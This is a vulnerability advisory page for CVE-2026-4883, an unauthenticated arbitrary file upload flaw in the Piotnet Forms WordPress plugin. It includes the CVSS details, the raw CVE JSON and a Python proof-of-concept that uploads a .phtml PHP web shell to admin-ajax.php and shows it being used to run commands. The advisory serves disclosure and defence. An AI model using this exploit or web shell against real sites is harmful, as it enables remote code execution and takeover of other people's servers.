Security Vulnerability Report
中文
CVE-2026-4883 CVSS 9.8 CRITICAL

CVE-2026-4883

Published: 2026-05-19 13:16:19
Last Modified: 2026-05-19 14:38:40
Source: [email protected]

Description

The Piotnet Forms plugin for WordPress is vulnerable to arbitrary file upload due to missing file type validation in the 'piotnetforms_ajax_form_builder' function in all versions up to, and including, 2.1.40. The plugin uses an incomplete extension blacklist that only blocks php, phpt, php5, php7, and exe extensions, while allowing dangerous extensions such as .phar or .phtml to be uploaded. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. Note: The exploit can only be exploited if a file field is added to the form.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Piotnet Forms <= 2.1.40

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target configuration target_url = "http://target-site.com/wp-admin/admin-ajax.php" # The vulnerable action usually processed by the plugin data = { "action": "piotnetforms_ajax_form_builder", # Other required form fields might be needed based on the specific form setup } # Prepare the malicious file payload # Using .phtml extension to bypass the incomplete blacklist files = { 'file': ('shell.phtml', '<?php system($_GET["cmd"]); ?>', 'application/octet-stream') } try: response = requests.post(target_url, data=data, files=files) if response.status_code == 200: print("[+] File uploaded successfully!") print("[+] Check the upload directory or response for the file path.") # Example usage: http://target-site.com/wp-content/uploads/2026/05/shell.phtml?cmd=ls else: print("[-] Upload failed. Status code:", response.status_code) print(response.text) except Exception as e: print(f"[-] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4883", "sourceIdentifier": "[email protected]", "published": "2026-05-19T13:16:19.340", "lastModified": "2026-05-19T14:38:39.660", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Piotnet Forms plugin for WordPress is vulnerable to arbitrary file upload due to missing file type validation in the 'piotnetforms_ajax_form_builder' function in all versions up to, and including, 2.1.40. The plugin uses an incomplete extension blacklist that only blocks php, phpt, php5, php7, and exe extensions, while allowing dangerous extensions such as .phar or .phtml to be uploaded. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. Note: The exploit can only be exploited if a file field is added to the form."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://piotnetforms.com", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9bd9c9db-d279-4de2-b5e4-ac7d8c919f2a?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.